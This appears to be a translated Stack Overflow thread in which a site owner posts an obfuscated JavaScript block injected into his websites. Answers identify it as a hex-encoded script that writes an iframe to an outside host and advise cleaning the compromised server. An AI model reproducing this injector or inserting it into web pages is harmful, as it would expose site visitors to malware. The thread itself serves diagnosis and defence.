JavaScript“病毒”

Question

JavaScript“病毒”

3

我在所有的网站中都有一些JS病毒问题。它们位于不同的主机上，其中有些主机上出现了这段代码。

<script>
function c2670903e0i49d9f1a845f6b(i49d9f1a846377) {
    var i49d9f1a846737 = 16;
    return (parseInt(i49d9f1a846377, i49d9f1a846737));
}
function i49d9f1a8472f3(i49d9f1a8476d9) {
    var i49d9f1a848679 = 2;
    var i49d9f1a847da9 = '';
    i49d9f1a848e47 = String.fromCharCode;
    for (i49d9f1a84828e = 0; i49d9f1a84828e < i49d9f1a8476d9.length; i49d9f1a84828e += i49d9f1a848679) {
        i49d9f1a847da9 += (i49d9f1a848e47(c2670903e0i49d9f1a845f6b(i49d9f1a8476d9.substr(i49d9f1a84828e, i49d9f1a848679))));
    }
    return i49d9f1a847da9;
}
var r1a = '';
var i49d9f1a84922e = '3C7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a +'43E696628216D7' + r1a + '96961297' + r1a + 'B646F637' + r1a + '56D656E7' + r1a + '42E7' + r1a + '7' + r1a + '7' + r1a + '2697' + r1a + '465287' + r1a + '56E657' + r1a + '363617' + r1a + '065282027' + r1a + '2533632536392536362537' + r1a + '322536312536642536352532302536652536312536642536352533642536332533322533362532302537' + r1a + '332537' + r1a + '32253633253364253237' + r1a + '2536382537' + r1a + '342537' + r1a + '342537' + r1a + '302533612532662532662536352536332536662536642532652537' + r1a + '322536312537' + r1a + '322536352536322537' + r1a + '322536352536352536342536362536662536662537' + r1a + '342537' + r1a + '37' + r1a + '2536352536312537' + r1a + '32253265253633253666253664253266253366253237' + r1a + '2532622534642536312537' + r1a + '342536382532652537' + r1a + '322536662537' + r1a + '352536652536342532382534642536312537' + r1a + '342536382532652537' + r1a + '32253631253665253634253666253664253238253239253261253332253335253332253331253336253334253239253262253237' + r1a + '253632253237' + r1a + '2532302537' + r1a + '37' + r1a + '2536392536342537' + r1a + '34253638253364253335253332253331253230253638253635253639253637' + r1a + '2536382537' + r1a + '342533642533342533382533342532302537' + r1a + '332537' + r1a + '342537' + r1a + '39253663253635253364253237' + r1a + '2537' + r1a + '362536392537' + r1a + '332536392536322536392536632536392537' + r1a + '342537' + r1a + '39253361253638253639253634253634253635253665253237' + r1a + '2533652533632532662536392536362537' + r1a + '3225363125366425363525336527' + r1a + '29293B7' + r1a + 'D7' + r1a + '6617' + r1a + '2206D7' + r1a + '969613D7' + r1a + '47' + r1a + '27' + r1a + '5653B3C2F7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a + '43E';
document.write(i49d9f1a8472f3(i49d9f1a84922e));
</script>

NOD32阻止该网站的访问，因为它认为存在病毒。从源代码中删除该代码无法解决问题，因为它会再次出现。它不可能是XSS的结果，因为即使在静态网站上也会出现。我已尝试对系统进行全面扫描，但没有帮助。唯一出现在所有网站上的是Google Analytics，我认为这不可能是导致问题的原因。编辑：您可以在http://www.postuj.cz/test/或http://flavicius.php5.cz/中查看此问题。

- Jakub Arnold

你确定这不是由浏览器插件生成的吗？如果其他人浏览您的网站会发生什么？ - Dead account

其他人也可以看到，这就是我发现的方式，我的一个朋友告诉我NOD32在那里发现了病毒。 - Jakub Arnold

2个回答

6

看起来像是Vundo或其变种。这种恶意软件会倾向于将看似无意义的JavaScript插入网站（在您的端口，而不是服务器端）。我建议尝试使用Malwarebytes' Anti-Malware。安装它，更新它，并进行全面扫描。如果失败了，也许可以尝试研究有关专门删除Vundo的选项。

- drarc

网页内容由stack overflow 提供, 点击上面的

可以查看英文原文，
原文链接

- bobince · Accepted Answer

它们位于不同的主机上，其中一些出现了这段代码。每个主机上的代码都一样吗？您能举一个受影响的域名的例子吗，以便我们可以检查该代码是否存在于服务器端，而不仅仅存在于您的计算机上（这通常是不太可能的）。

您发布的代码确实非常可疑。一旦解码，它会将一个iframe写入到http://ecom.rarebreedfootwear.com/?（它试图向URL添加cachebuster随机数，但由于拼写错误而失败）。

在该地址中没有明显的漏洞 - 可能最终目标尚未放置，或者只是为以后的真正攻击进行测试，但是在您的网站上出现意外的JavaScript，该脚本会解码自身并添加一个iframe，这是一个巨大的红旗。通常，这意味着您的服务器已被入侵，并需要重新安装新密码。

估计时间：

你可以在hxxp://flavicius.php5.cz/上看到它。

谢谢。我删除了评论以隐藏工作URL，因为它确实被感染了。无论是在应用程序级别还是在Apache本身上，都不清楚，但是每个页面底部都有可疑的脚本。

因此，至少应用程序和可能的服务器都已被入侵，应该将其离线进行清理，重新安装和诊断：您需要找出攻击者如何进入，以便不再发生。首先猜测，请检查您是否拥有最新版本的WordPress，因为它过去曾遭受过许多安全漏洞。